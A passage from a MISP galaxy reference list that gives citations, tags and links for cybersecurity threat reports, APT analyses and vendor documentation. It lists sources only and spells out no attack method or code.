HP SVCReady Jun 2022

Schlapfer, Patrick. (2022, June 6). A New Loader Gets Ready. Retrieved December 13, 2022.

The tag is: misp-galaxy:references="HP SVCReady Jun 2022"

Table 12604. Table References

Links

https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/

SecureList Fileless

Legezo, D. (2022, May 4). A new secret stash for “fileless” malware. Retrieved March 23, 2023.

The tag is: misp-galaxy:references="SecureList Fileless"

Table 12605. Table References

Links

https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/

ESET Ebury Feb 2014

M.Léveillé, M.. (2014, February 21). An In-depth Analysis of Linux/Ebury. Retrieved April 19, 2019.

The tag is: misp-galaxy:references="ESET Ebury Feb 2014"

Table 12606. Table References

Links

https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/

Welivesecurity Ebury SSH

M.Léveillé, M. (2014, February 21). An In-depth Analysis of Linux/Ebury. Retrieved January 8, 2018.

The tag is: misp-galaxy:references="Welivesecurity Ebury SSH"

Table 12607. Table References

Links

https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/

Avertium Black Basta June 2022

Avertium. (2022, June 1). AN IN-DEPTH LOOK AT BLACK BASTA RANSOMWARE. Retrieved March 7, 2023.

The tag is: misp-galaxy:references="Avertium Black Basta June 2022"

Table 12608. Table References

Links

https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware

Myers 2007

Myers, M., and Youndt, S. (2007). An Introduction to Hardware-Assisted Virtual Machine (HVM) Rootkits. Retrieved November 13, 2014.

The tag is: misp-galaxy:references="Myers 2007"

Table 12609. Table References

Links

http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.90.8832&rep=rep1&type=pdf

Linux Services Run Levels

The Linux Foundation. (2006, January 11). An introduction to services, runlevels, and rc.d scripts. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Linux Services Run Levels"

Table 12610. Table References

Links

https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/

Anomali Pirate Panda April 2020

Moore, S. et al. (2020, April 30). Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center. Retrieved May 19, 2020.

The tag is: misp-galaxy:references="Anomali Pirate Panda April 2020"

Table 12611. Table References

Links

https://www.anomali.com/blog/anomali-suspects-that-china-backed-apt-pirate-panda-may-be-seeking-access-to-vietnam-government-data-center#When:15:00:00Z

AnonGhost Team Profile

ADL. (2015, July 6). AnonGhost Team. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="AnonGhost Team Profile"

Table 12612. Table References

Links

https://www.adl.org/resources/profile/anonghost-team

AnonHBGary

Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.

The tag is: misp-galaxy:references="AnonHBGary"

Table 12613. Table References

Links

https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/

Fortinet Metamorfo Feb 2020

Zhang, X. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020.

The tag is: misp-galaxy:references="Fortinet Metamorfo Feb 2020"

Table 12614. Table References

Links

https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions

MuddyWater TrendMicro June 2018

Villanueva, M., Co, M. (2018, June 14). Another Potential MuddyWater Campaign uses Powershell-based PRB-Backdoor. Retrieved July 3, 2018.

The tag is: misp-galaxy:references="MuddyWater TrendMicro June 2018"

Table 12615. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/another-potential-muddywater-campaign-uses-powershell-based-prb-backdoor/

AlienVault Sykipot 2011

Blasco, J. (2011, December 12). Another Sykipot sample likely targeting US federal agencies. Retrieved March 28, 2016.

The tag is: misp-galaxy:references="AlienVault Sykipot 2011"

Table 12616. Table References

Links

https://www.alienvault.com/open-threat-exchange/blog/another-sykipot-sample-likely-targeting-us-federal-agencies

RiskIQ Newegg September 2018

Klijnsma, Y. (2018, September 19). Another Victim of the Magecart Assault Emerges: Newegg. Retrieved September 9, 2020.

The tag is: misp-galaxy:references="RiskIQ Newegg September 2018"

Table 12617. Table References

Links

https://web.archive.org/web/20181209083100/https://www.riskiq.com/blog/labs/magecart-newegg/

Dell WMI Persistence

Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016, March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016.

The tag is: misp-galaxy:references="Dell WMI Persistence"

Table 12618. Table References

Links

https://www.secureworks.com/blog/wmi-persistence

iDefense Rootkit Overview

Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved April 6, 2018.

The tag is: misp-galaxy:references="iDefense Rootkit Overview"

Table 12619. Table References

Links

http://www.megasecurity.org/papers/Rootkits.pdf

Mandiant Ukraine Cyber Threats January 2022

Hultquist, J. (2022, January 20). Anticipating Cyber Threats as the Ukraine Crisis Escalates. Retrieved January 24, 2022.

The tag is: misp-galaxy:references="Mandiant Ukraine Cyber Threats January 2022"

Table 12620. Table References

Links

https://www.mandiant.com/resources/ukraine-crisis-cyber-threats

Microsoft AMSI

Microsoft. (2019, April 19). Antimalware Scan Interface (AMSI). Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft AMSI"

Table 12621. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal

Microsoft Anti Spoofing

Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Microsoft Anti Spoofing"

Table 12622. Table References

Links

https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide

Fox-It Anunak Feb 2015

Prins, R. (2015, February 16). Anunak (aka Carbanak) Update. Retrieved January 20, 2017.

The tag is: misp-galaxy:references="Fox-It Anunak Feb 2015"

Table 12623. Table References

Links

https://www.fox-it.com/en/news/blog/anunak-aka-carbanak-update/

Group-IB Anunak

Group-IB and Fox-IT. (2014, December). Anunak: APT against financial institutions. Retrieved April 20, 2016.

The tag is: misp-galaxy:references="Group-IB Anunak"

Table 12624. Table References

Links

http://www.group-ib.com/files/Anunak_APT_against_financial_institutions.pdf

Google TAG Ukraine Threat Landscape March 2022

Huntley, S. (2022, March 7). An update on the threat landscape. Retrieved March 16, 2022.

The tag is: misp-galaxy:references="Google TAG Ukraine Threat Landscape March 2022"

Table 12625. Table References

Links

https://blog.google/threat-analysis-group/update-threat-landscape-ukraine

Zairon Hooking Dec 2006

Felici, M. (2006, December 6). Any application-defined hook procedure on my machine?. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="Zairon Hooking Dec 2006"

Table 12626. Table References

Links

https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/

SentinelOne Aoqin Dragon June 2022

Chen, Joey. (2022, June 9). Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years. Retrieved July 14, 2022.

The tag is: misp-galaxy:references="SentinelOne Aoqin Dragon June 2022"

Table 12627. Table References

Links

https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/

Apache Server 2018

Apache. (n.d.). Apache HTTP Server Version 2.4 Documentation - Web Site Content. Retrieved July 27, 2018.

The tag is: misp-galaxy:references="Apache Server 2018"

Table 12628. Table References

Links

http://httpd.apache.org/docs/2.4/getting-started.html#content

Secureworks BRONZEUNION Feb 2019

Counter Threat Unit Research Team. (2019, February 27). A Peek into BRONZE UNION’s Toolbox. Retrieved September 24, 2019.

The tag is: misp-galaxy:references="Secureworks BRONZEUNION Feb 2019"

Table 12629. Table References

Links

https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox

AppArmor official

AppArmor. (2017, October 19). AppArmor Security Project Wiki. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="AppArmor official"

Table 12630. Table References

Links

http://wiki.apparmor.net/index.php/Main_Page

Mandiant APT1 Appendix

Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal. Retrieved July 18, 2016.

The tag is: misp-galaxy:references="Mandiant APT1 Appendix"

Table 12631. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip

AppInit Secure Boot

Microsoft. (n.d.). AppInit DLLs and Secure Boot. Retrieved July 15, 2015.

The tag is: misp-galaxy:references="AppInit Secure Boot"

Table 12632. Table References

Links

https://msdn.microsoft.com/en-us/library/dn280412

AppInstaller.exe - LOLBAS Project

LOLBAS. (2020, December 2). AppInstaller.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="AppInstaller.exe - LOLBAS Project"

Table 12633. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/

objectivesee osx.shlayer apple approved 2020

Patrick Wardle. (2020, August 30). Apple Approved Malware malicious code …​now notarized!? #2020. Retrieved September 13, 2021.

The tag is: misp-galaxy:references="objectivesee osx.shlayer apple approved 2020"

Table 12634. Table References

Links

https://objective-see.com/blog/blog_0x4E.html

AppleDocs AuthorizationExecuteWithPrivileges

Apple. (n.d.). Apple Developer Documentation - AuthorizationExecuteWithPrivileges. Retrieved August 8, 2019.

The tag is: misp-galaxy:references="AppleDocs AuthorizationExecuteWithPrivileges"

Table 12635. Table References

Links

https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg

AppleDocs Scheduling Timed Jobs

Apple. (n.d.). Retrieved July 17, 2017.

The tag is: misp-galaxy:references="AppleDocs Scheduling Timed Jobs"

Table 12636. Table References

Links

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/ScheduledJobs.html

CISA AppleJeus Feb 2021

Cybersecurity and Infrastructure Security Agency. (2021, February 21). AppleJeus: Analysis of North Korea’s Cryptocurrency Malware. Retrieved March 1, 2021.

The tag is: misp-galaxy:references="CISA AppleJeus Feb 2021"

Table 12637. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/aa21-048a

Apple Remote Desktop Admin Guide 3.3

Apple. (n.d.). Apple Remote Desktop Administrator Guide Version 3.3. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="Apple Remote Desktop Admin Guide 3.3"

Table 12638. Table References

Links

https://images.apple.com/remotedesktop/pdf/ARD_Admin_Guide_v3.3.pdf

applescript signing

Steven Sande. (2013, December 23). AppleScript and Automator gain new features in OS X Mavericks. Retrieved September 21, 2018.

The tag is: misp-galaxy:references="applescript signing"

Table 12639. Table References

Links

https://www.engadget.com/2013/10/23/applescript-and-automator-gain-new-features-in-os-x-mavericks/

Corio 2008

Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.

The tag is: misp-galaxy:references="Corio 2008"

Table 12640. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

Microsoft Application Lockdown

Corio, C., & Sayana, D. P.. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.

The tag is: misp-galaxy:references="Microsoft Application Lockdown"

Table 12641. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/technet-magazine/cc510322(v=msdn.10)?redirectedfrom=MSDN

SANS Application Whitelisting

Beechey, J.. (2014, November 18). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.

The tag is: misp-galaxy:references="SANS Application Whitelisting"

Table 12642. Table References

Links

https://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

Beechey 2010

Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.

The tag is: misp-galaxy:references="Beechey 2010"

Table 12643. Table References

Links

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

NSA MS AppLocker

NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.

The tag is: misp-galaxy:references="NSA MS AppLocker"

Table 12644. Table References

Links

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

Penetration Testing Lab MSXSL July 2017

netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved July 3, 2018.

The tag is: misp-galaxy:references="Penetration Testing Lab MSXSL July 2017"

Table 12645. Table References

Links

https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/

Microsoft Requests for Azure AD Roles in Privileged Identity Management

Microsoft. (2023, January 30). Approve or deny requests for Azure AD roles in Privileged Identity Management. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="Microsoft Requests for Azure AD Roles in Privileged Identity Management"

Table 12646. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/azure-ad-pim-approval-workflow

Apple App Security Overview

Apple Inc. (2021, February 18). App security overview. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="Apple App Security Overview"

Table 12647. Table References

Links

https://support.apple.com/guide/security/app-security-overview-sec35dd877d0/1/web/1

Tripwire AppUNBlocker

Smith, T. (2016, October 27). AppUNBlocker: Bypassing AppLocker. Retrieved December 19, 2017.

The tag is: misp-galaxy:references="Tripwire AppUNBlocker"

Table 12648. Table References

Links

https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/

Appvlp.exe - LOLBAS Project

LOLBAS. (2018, May 25). Appvlp.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Appvlp.exe - LOLBAS Project"

Table 12649. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/

BlackHat Atkinson Winchester Token Manipulation

Atkinson, J., Winchester, R. (2017, December 7). A Process is No One: Hunting for Token Manipulation. Retrieved December 21, 2017.

The tag is: misp-galaxy:references="BlackHat Atkinson Winchester Token Manipulation"

Table 12650. Table References

Links

https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf

FireEye APT10 April 2017

FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.

The tag is: misp-galaxy:references="FireEye APT10 April 2017"

Table 12651. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

Securelist APT10 March 2021

GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.

The tag is: misp-galaxy:references="Securelist APT10 March 2021"

Table 12652. Table References

Links

https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/

FireEye APT10 Sept 2018

Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.

The tag is: misp-galaxy:references="FireEye APT10 Sept 2018"

Table 12653. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html

NCC Group APT15 Alive and Strong

Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018.

The tag is: misp-galaxy:references="NCC Group APT15 Alive and Strong"

Table 12654. Table References

Links

https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/

Mandiant APT1

Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.

The tag is: misp-galaxy:references="Mandiant APT1"

Table 12655. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

Profero APT27 December 2020

Global Threat Center, Intelligence Team. (2020, December). APT27 Turns to Ransomware. Retrieved November 12, 2021.

The tag is: misp-galaxy:references="Profero APT27 December 2020"

Table 12656. Table References

Links

https://web.archive.org/web/20210104144857/https://shared-public-reports.s3-eu-west-1.amazonaws.com/APT27+turns+to+ransomware.pdf

FireEye APT28 January 2017

FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.

The tag is: misp-galaxy:references="FireEye APT28 January 2017"

Table 12657. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

FireEye APT28

FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.

The tag is: misp-galaxy:references="FireEye APT28"

Table 12658. Table References

Links

https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf

U.S. CISA APT28 Cisco Routers April 18 2023

Cybersecurity and Infrastructure Security Agency. (2023, April 18). APT28 Exploits Known Vulnerability to Carry Out Reconnaissance and Deploy Malware on Cisco Routers. Retrieved August 23, 2023.

The tag is: misp-galaxy:references="U.S. CISA APT28 Cisco Routers April 18 2023"

Table 12659. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-108

Symantec APT28 Oct 2018

Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.

The tag is: misp-galaxy:references="Symantec APT28 Oct 2018"

Table 12660. Table References

Links

https://www.symantec.com/blogs/election-security/apt28-espionage-military-government

FireEye APT28 Hospitality Aug 2017

Smith, L. and Read, B.. (2017, August 11). APT28 Targets Hospitality Sector, Presents Threat to Travelers. Retrieved August 17, 2017.

The tag is: misp-galaxy:references="FireEye APT28 Hospitality Aug 2017"

Table 12661. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html

Bitdefender APT28 Dec 2015

Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017.

The tag is: misp-galaxy:references="Bitdefender APT28 Dec 2015"

Table 12662. Table References

Links

https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf

FireEye APT29 Domain Fronting With TOR March 2017

Matthew Dunwoody. (2017, March 27). APT29 Domain Fronting With TOR. Retrieved November 20, 2017.

The tag is: misp-galaxy:references="FireEye APT29 Domain Fronting With TOR March 2017"

Table 12663. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html

FireEye APT29 Domain Fronting

Dunwoody, M. (2017, March 27). APT29 Domain Fronting With TOR. Retrieved March 27, 2017.

The tag is: misp-galaxy:references="FireEye APT29 Domain Fronting"

Table 12664. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html

FireEye APT30

FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015.

The tag is: misp-galaxy:references="FireEye APT30"

Table 12665. Table References

Links

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Zscaler APT31 Covid-19 October 2020

Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021.

The tag is: misp-galaxy:references="Zscaler APT31 Covid-19 October 2020"

Table 12666. Table References

Links

https://www.zscaler.com/blogs/security-research/apt-31-leverages-covid-19-vaccine-theme-and-abuses-legitimate-online

sentinelone apt32 macOS backdoor 2020

Phil Stokes. (2020, December 2). APT32 Multi-stage macOS Trojan Innovates on Crimeware Scripting Technique. Retrieved September 13, 2021.

The tag is: misp-galaxy:references="sentinelone apt32 macOS backdoor 2020"

Table 12667. Table References

Links

https://www.sentinelone.com/labs/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/

FireEye APT33 Webinar Sept 2017

Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="FireEye APT33 Webinar Sept 2017"

Table 12668. Table References

Links

https://www.brighttalk.com/webcast/10703/275683

FireEye APT34 Webinar Dec 2017

Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="FireEye APT34 Webinar Dec 2017"

Table 12669. Table References

Links

https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east

DFIR Report APT35 ProxyShell March 2022

DFIR Report. (2022, March 21). APT35 Automates Initial Access Using ProxyShell. Retrieved May 25, 2022.

The tag is: misp-galaxy:references="DFIR Report APT35 ProxyShell March 2022"

Table 12670. Table References

Links

https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell

Check Point APT35 CharmPower January 2022

Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022.

The tag is: misp-galaxy:references="Check Point APT35 CharmPower January 2022"

Table 12671. Table References

Links

https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/

FireEye APT37 Feb 2018

FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.

The tag is: misp-galaxy:references="FireEye APT37 Feb 2018"

Table 12672. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

FireEye APT38 Oct 2018

FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.

The tag is: misp-galaxy:references="FireEye APT38 Oct 2018"

Table 12673. Table References

Links

https://content.fireeye.com/apt/rpt-apt38

FireEye APT39 Jan 2019

Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019.

The tag is: misp-galaxy:references="FireEye APT39 Jan 2019"

Table 12674. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html

APT3 Adversary Emulation Plan

Korban, C, et al. (2017, September). APT3 Adversary Emulation Plan. Retrieved January 16, 2018.

The tag is: misp-galaxy:references="APT3 Adversary Emulation Plan"

Table 12675. Table References

Links

https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf

evolution of pirpi

Yates, M. (2017, June 18). APT3 Uncovered: The code evolution of Pirpi. Retrieved September 28, 2017.

The tag is: misp-galaxy:references="evolution of pirpi"

Table 12676. Table References

Links

https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirpi.pdf

FireEye APT40 March 2019

Plan, F., et al. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019.

The tag is: misp-galaxy:references="FireEye APT40 March 2019"

Table 12677. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html

Mandiant APT42

Mandiant. (n.d.). APT42: Crooked Charms, Cons and Compromise. Retrieved September 16, 2022.

The tag is: misp-galaxy:references="Mandiant APT42"

Table 12678. Table References

Links

https://www.mandiant.com/media/17826

QiAnXin APT-C-36 Feb2019

QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020.

The tag is: misp-galaxy:references="QiAnXin APT-C-36 Feb2019"

Table 12679. Table References

Links

https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/

360 Machete Sep 2020

kate. (2020, September 25). APT-C-43 steals Venezuelan military secrets to provide intelligence support for the reactionaries — HpReact campaign. Retrieved November 20, 2020.

The tag is: misp-galaxy:references="360 Machete Sep 2020"

Table 12680. Table References

Links

https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/

Cycraft Chimera April 2020

Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020.

The tag is: misp-galaxy:references="Cycraft Chimera April 2020"

Table 12681. Table References

Links

https://cycraft.com/download/CyCraft-Whitepaper-Chimera_V4.1.pdf

CISA IT Service Providers

CISA. (n.d.). APTs Targeting IT Service Provider Customers. Retrieved November 16, 2020.

The tag is: misp-galaxy:references="CISA IT Service Providers"

Table 12682. Table References

Links

https://us-cert.cisa.gov/APTs-Targeting-IT-Service-Provider-Customers

Securelist GCMAN

Kaspersky Lab’s Global Research & Analysis Team. (2016, February 8). APT-style bank robberies increase with Metel, GCMAN and Carbanak 2.0 attacks. Retrieved April 20, 2016.

The tag is: misp-galaxy:references="Securelist GCMAN"

Table 12683. Table References

Links

https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/

Proofpoint TA459 April 2017

Axel F. (2017, April 27). APT Targets Financial Analysts with CVE-2017-0199. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="Proofpoint TA459 April 2017"

Table 12684. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts

Global Research and Analysis Team . (2018, April 12). APT Trends report Q1 2018. Retrieved January 27, 2021.

The tag is: misp-galaxy:references="Securelist APT Trends April 2018"

Table 12685. Table References

Links

https://securelist.com/apt-trends-report-q1-2018/85280/

Global Research and Analysis Team. (2020, April 30). APT trends report Q1 2020. Retrieved September 19, 2022.

The tag is: misp-galaxy:references="Kaspersky APT Trends Q1 2020"

Table 12686. Table References

Links

https://securelist.com/apt-trends-report-q1-2020/96826/

GReAT . (2021, April 27). APT trends report Q1 2021. Retrieved June 6, 2022.

The tag is: misp-galaxy:references="Kaspersky APT Trends Q1 April 2021"

Table 12687. Table References

Links

https://securelist.com/apt-trends-report-q1-2021/101967

Kaspersky Lab’s Global Research & Analysis Team. (2017, August 8). APT Trends report Q2 2017. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="Securelist APT Trends Q2 2017"

Table 12688. Table References

Links

https://securelist.com/apt-trends-report-q2-2017/79332/

Wald0 Guide to GPOs

Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and OUs. Retrieved March 5, 2019.

The tag is: misp-galaxy:references="Wald0 Guide to GPOs"

Table 12689. Table References

Links

https://wald0.com/?p=179

Lau 2011

Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? (Infographic). Retrieved November 13, 2014.

The tag is: misp-galaxy:references="Lau 2011"

Table 12690. Table References

Links

http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion

Krebs-Booter

Brian Krebs. (2016, October 27). Are the Days of “Booter” Services Numbered?. Retrieved May 15, 2017.

The tag is: misp-galaxy:references="Krebs-Booter"

Table 12691. Table References

Links

https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/

RSA Forfiles Aug 2017

Partington, E. (2017, August 14). Are you looking out for forfiles.exe (if you are watching for cmd.exe). Retrieved January 22, 2018.

The tag is: misp-galaxy:references="RSA Forfiles Aug 2017"

Table 12692. Table References

Links

https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe

FireEye Respond Webinar July 2017

Scavella, T. and Rifki, A. (2017, July 20). Are you Ready to Respond? (Webinar). Retrieved October 4, 2017.

The tag is: misp-galaxy:references="FireEye Respond Webinar July 2017"

Table 12693. Table References

Links

https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html

TechNet Arp

Microsoft. (n.d.). Arp. Retrieved April 17, 2016.

The tag is: misp-galaxy:references="TechNet Arp"

Table 12694. Table References

Links

https://technet.microsoft.com/en-us/library/bb490864.aspx

Cisco ARP Poisoning Mitigation 2016

King, J., Lauerman, K. (2016, January 22). ARP Poisoning (Man-in-the-Middle) Attack and Mitigation Technique. Retrieved October 15, 2020.

The tag is: misp-galaxy:references="Cisco ARP Poisoning Mitigation 2016"

Table 12695. Table References

Links

https://www.cisco.com/c/en/us/products/collateral/switches/catalyst-6500-series-switches/white_paper_c11_603839.html

ASEC Emotet 2017

ASEC. (2017). ASEC REPORT VOL.88. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="ASEC Emotet 2017"

Table 12696. Table References

Links

https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.88_ENG.pdf

ASERT Seven Pointed Dagger Aug 2015

ASERT. (2015, August). ASERT Threat Intelligence Report – Uncovering the Seven Pointed Dagger. Retrieved March 19, 2018.

The tag is: misp-galaxy:references="ASERT Seven Pointed Dagger Aug 2015"

Table 12697. Table References

Links

https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf

Securelist Sofacy Feb 2018

Kaspersky Lab’s Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.

The tag is: misp-galaxy:references="Securelist Sofacy Feb 2018"

Table 12698. Table References

Links

https://securelist.com/a-slice-of-2017-sofacy-activity/83930/

THE FINANCIAL TIMES LTD 2019.

THE FINANCIAL TIMES. (2019, September 2). A sobering day. Retrieved October 8, 2019.

The tag is: misp-galaxy:references="THE FINANCIAL TIMES LTD 2019."

Table 12699. Table References

Links

https://labs.ft.com/2013/05/a-sobering-day/?mhq5j=e6

Aspnet_Compiler.exe - LOLBAS Project

LOLBAS. (2021, September 26). Aspnet_Compiler.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Aspnet_Compiler.exe - LOLBAS Project"

Table 12700. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/

Mandiant UNC2452 APT29 April 2022

Mandiant. (2020, April 27). Assembling the Russian Nesting Doll: UNC2452 Merged into APT29. Retrieved March 26, 2023.

The tag is: misp-galaxy:references="Mandiant UNC2452 APT29 April 2022"

Table 12701. Table References

Links

https://www.mandiant.com/resources/blog/unc2452-merged-into-apt29

Microsoft Assoc Oct 2017

